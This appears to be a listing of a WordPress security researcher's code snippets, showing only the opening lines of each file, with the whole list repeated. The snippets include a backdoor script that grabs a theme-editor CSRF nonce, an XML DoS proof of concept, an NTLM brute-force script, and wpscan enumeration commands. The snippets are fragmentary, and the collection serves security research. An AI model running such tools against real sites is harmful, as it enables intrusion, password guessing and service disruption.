Ryan Dewhurst ethicalhack3r

## pluggable.php
<?php

if ( !function_exists('wp_generate_auth_cookie') ) :
/**
 * Generate authentication cookie contents.
 *
 * @since 2.5.0
 *
 * @param int $user_id User ID
 * @param int $expiration Cookie expiration in seconds

## backdoor.js
var wpnonce = '';

function getCSRFNonce(callback)
{
  var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/

  var xhr = new XMLHttpRequest();
  xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
  xhr.withCredentials = true;
  xhr.overrideMimeType('text/xml');

## info.text
Get your API token from wpvulndb.com if you also want the vulnerabilities associated with the detected plugin displaying.

For all plugins with known vulnerabilities:

wpscan --url example.com -e vp --plugins-detection mixed --api-token YOUR_TOKEN

For all plugins in our database (could take a very long time):

wpscan --url example.com -e ap --plugins-detection mixed --api-token YOUR_TOKEN

## wp_dos.py
#################################################################################
# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS#
# Author: Nir Goldshlager - Salesforce.com Product Security Team#
# This is a Proof of Concept Exploit, Please use responsibly.#
#################################################################################
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import urllib

## magento_version.rb
#!/usr/bin/env ruby

require 'typhoeus'
require 'json'
require 'uri'
require 'digest/md5'

# https://raw.githubusercontent.com/gwillem/magento-version-identification/master/version_hashes.json

target  = ARGV[0]

## wp_php_object_injection.rb
java_import 'burp.IBurpExtender'
java_import 'burp.IScannerCheck'
java_import 'burp.IScanIssue'

require 'java'
java_import 'java.util.Arrays'
java_import 'java.util.ArrayList'

#
# You will need to download JRuby's Complete.jar file from http://jruby.org/download and configure Burp Extender with its path.

## ids.txt
> select id from vulnerabilities where poc != '';
+------+
| id   |
+------+
| 6028 |
| 6219 |
| 6499 |
| 6548 |
| 7680 |
| 7710 |

## is_wordpress.rb
#!/usr/bin/env ruby

require 'wpscan'
require 'uri'

filename = ARGV[0]

def check_wordpress( website )
  WPScan::Browser.instance( disable_tls_checks: true )

## mad5.txt
Yes, this is a joke. But we will really be releasing a WordPress plugin. Let us know if you find any vulnerabilities ;)
9f10c5276812e8fdabc2c4e5bb75f836

## http_ntlm__auth_brute.rb
#!/usr/bin/env ruby

require 'typhoeus'

target_url = ARGV[0]
usernames  = File.read(ARGV[1]).split("\n")
passwords  = File.read(ARGV[2]).split("\n")

hydra = Typhoeus::Hydra.new
	<?php

	if ( !function_exists('wp_generate_auth_cookie') ) :
	/**
	* Generate authentication cookie contents.
	*
	* @since 2.5.0
	*
	* @param int $user_id User ID
	* @param int $expiration Cookie expiration in seconds
	var wpnonce = '';

	function getCSRFNonce(callback)
	{
	var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/

	var xhr = new XMLHttpRequest();
	xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
	xhr.withCredentials = true;
	xhr.overrideMimeType('text/xml');
	Get your API token from wpvulndb.com if you also want the vulnerabilities associated with the detected plugin displaying.

	For all plugins with known vulnerabilities:

	wpscan --url example.com -e vp --plugins-detection mixed --api-token YOUR_TOKEN

	For all plugins in our database (could take a very long time):

	wpscan --url example.com -e ap --plugins-detection mixed --api-token YOUR_TOKEN
	#################################################################################
	# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS#
	# Author: Nir Goldshlager - Salesforce.com Product Security Team#
	# This is a Proof of Concept Exploit, Please use responsibly.#
	#################################################################################
	#!/usr/bin/env python
	from __future__ import print_function
	import threading
	import time
	import urllib
	#!/usr/bin/env ruby

	require 'typhoeus'
	require 'json'
	require 'uri'
	require 'digest/md5'

	# https://raw.githubusercontent.com/gwillem/magento-version-identification/master/version_hashes.json

	target = ARGV[0]
	java_import 'burp.IBurpExtender'
	java_import 'burp.IScannerCheck'
	java_import 'burp.IScanIssue'

	require 'java'
	java_import 'java.util.Arrays'
	java_import 'java.util.ArrayList'

	#
	# You will need to download JRuby's Complete.jar file from http://jruby.org/download and configure Burp Extender with its path.
	> select id from vulnerabilities where poc != '';
	+------+
	\| id \|
	+------+
	\| 6028 \|
	\| 6219 \|
	\| 6499 \|
	\| 6548 \|
	\| 7680 \|
	\| 7710 \|
	#!/usr/bin/env ruby

	require 'wpscan'
	require 'uri'

	filename = ARGV[0]

	def check_wordpress( website )
	WPScan::Browser.instance( disable_tls_checks: true )
	Yes, this is a joke. But we will really be releasing a WordPress plugin. Let us know if you find any vulnerabilities ;)
	9f10c5276812e8fdabc2c4e5bb75f836
	#!/usr/bin/env ruby

	require 'typhoeus'

	target_url = ARGV[0]
	usernames = File.read(ARGV[1]).split("\n")
	passwords = File.read(ARGV[2]).split("\n")

	hydra = Typhoeus::Hydra.new